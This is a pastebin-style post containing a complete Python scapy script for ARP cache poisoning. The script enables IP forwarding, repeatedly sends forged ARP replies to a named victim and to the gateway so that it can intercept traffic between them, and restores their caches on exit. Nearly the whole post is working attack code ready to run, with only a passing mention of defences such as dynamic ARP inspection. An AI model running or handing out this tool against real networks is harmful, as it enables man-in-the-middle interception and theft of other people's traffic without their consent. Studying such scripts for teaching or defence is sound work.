Harman5007

ARP Cache Poisoning

Feb 5th, 2021
  1. from scapy.all import Ether, ARP, srp, send
  2. import argparse
  3. import time
  4. import os
  5. import sys
  6.  
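def _enable_linux_iproute(file_path="/proc/sys/net/ipv4/ip_forward"):
    """
    Enable IP forwarding on a Linux host by writing ``1`` to the sysctl file.

    Args:
        file_path: Path of the ``ip_forward`` sysctl entry. Defaults to the
            standard /proc location; it is a parameter mainly so the function
            can be exercised against a temporary file.

    Raises:
        OSError: if the file cannot be read or written (the /proc entry is
            normally writable only by root).
    """
    with open(file_path) as f:
        # The file holds text ("0\n" or "1\n"), so the comparison has to be
        # against the string "1"; comparing with the int 1 never matches.
        if f.read().strip() == "1":
            # already enabled, leave the file untouched
            return
    with open(file_path, "w") as f:
        print(1, file=f)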
  18.  
  19.  
def _enable_windows_iproute():
    """
    Enable IP forwarding on Windows by starting the "RemoteAccess" service.

    The import is local because the ``services`` helper module is only
    needed (and presumably only importable) on Windows.
    """
    from services import WService

    remote_access = WService("RemoteAccess")
    remote_access.start()
  28.  
  29.  
def enable_ip_route(verbose=True):
    """
    Enable IP forwarding on the current host.

    Dispatches to the Windows helper when ``os.name`` contains "nt" and to
    the Linux helper otherwise; both need administrative privileges.

    Args:
        verbose: when True, print a status line before and after enabling.
    """
    if verbose:
        print("[!] Enabling IP Routing...")
    if "nt" in os.name:
        _enable_windows_iproute()
    else:
        _enable_linux_iproute()
    if verbose:
        print("[!] IP Routing enabled.")
  39.  
  40.  
def get_mac(ip):
    """
    Resolve ``ip`` to a MAC address with a broadcast ARP who-has request.

    Returns the source MAC of the first host that answers, or None when
    nothing answers within the 3-second timeout (host down or off-link).
    """
    query = Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=ip)
    answered, _ = srp(query, timeout=3, verbose=0)
    if not answered:
        return None
    return answered[0][1].src
  49.  
  50.  
def spoof(target_ip, host_ip, verbose=True):
    """
    Send one forged ARP reply to `target_ip` claiming `host_ip` is at our MAC.

    This overwrites the `host_ip` entry in the target's ARP cache (ARP cache
    poisoning). Unsolicited replies of this kind are exactly what dynamic
    ARP inspection and static ARP entries exist to detect or block.

    Args:
        target_ip: IP of the host whose ARP cache is modified.
        host_ip: IP the reply claims to come from (typically the gateway).
        verbose: when True, print one line describing the reply sent.
    """
    # get the mac address of the target
    # NOTE(review): get_mac returns None when the target does not answer;
    # that None is passed straight through as hwdst below without a check —
    # confirm how scapy treats it before relying on this path.
    target_mac = get_mac(target_ip)
    # craft the arp 'is-at' operation packet, in other words; an ARP response
    # we don't specify 'hwsrc' (source MAC address)
    # because by default, 'hwsrc' is the real MAC address of the sender (ours)
    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
    # send the packet
    # verbose = 0 means that we send the packet without printing any thing
    send(arp_response, verbose=0)
    if verbose:
        # get the MAC address of the default interface we are using
        self_mac = ARP().hwsrc
        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
  69.  
  70.  
def restore(target_ip, host_ip, verbose=True):
    """
    Undo the poisoning of `target_ip` by sending it the real MAC of `host_ip`.

    Both MACs are re-resolved with get_mac, then a correct ARP packet is
    sent seven times so the target's cache returns to the true mapping.

    Args:
        target_ip: IP of the host whose ARP cache is repaired.
        host_ip: IP whose real MAC is restored in that cache.
        verbose: when True, print one line describing the packet sent.
    """
    # get the real MAC address of target
    target_mac = get_mac(target_ip)
    # get the real MAC address of spoofed (gateway, i.e router)
    # NOTE(review): either lookup returns None if the host does not answer;
    # the None would then be placed in the packet fields below unchecked.
    host_mac = get_mac(host_ip)
    # crafting the restoring packet
    # NOTE(review): no `op` is given, so scapy's default (who-has, 1)
    # applies — unlike spoof(), which sets op='is-at' explicitly; confirm
    # the target updates its cache from a request if that is relied upon.
    arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac)
    # sending the restoring packet
    # to restore the network to its normal process
    # we send each reply seven times for a good measure (count=7)
    send(arp_response, verbose=0, count=7)
    if verbose:
        print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
  89.  
  90.  
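if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="ARP spoof script")
    parser.add_argument("target", help="Victim IP Address to ARP poison")
    parser.add_argument("host", help="Host IP Address, the host you wish to intercept packets for (usually the gateway)")
    # store_true defaults to False, so the flag switches verbosity ON; the
    # help text must not claim the default is True.
    parser.add_argument("-v", "--verbose", action="store_true", help="print a message for each ARP packet sent (default: off)")
    args = parser.parse_args()
    target, host, verbose = args.target, args.host, args.verbose

    # Writes the ip_forward sysctl (or starts a Windows service), so this
    # normally needs root/administrator rights.
    enable_ip_route()
    try:
        while True:
            # telling the `target` that we are the `host`
            spoof(target, host, verbose)
            # telling the `host` that we are the `target`
            spoof(host, target, verbose)
            # sleep for one second
            time.sleep(1)
    except KeyboardInterrupt:
        # restore() always prints (its verbose defaults to True), regardless
        # of the -v flag chosen above.
        print("[!] Detected CTRL+C ! restoring the network, please wait...")
        restore(target, host)
        restore(host, target)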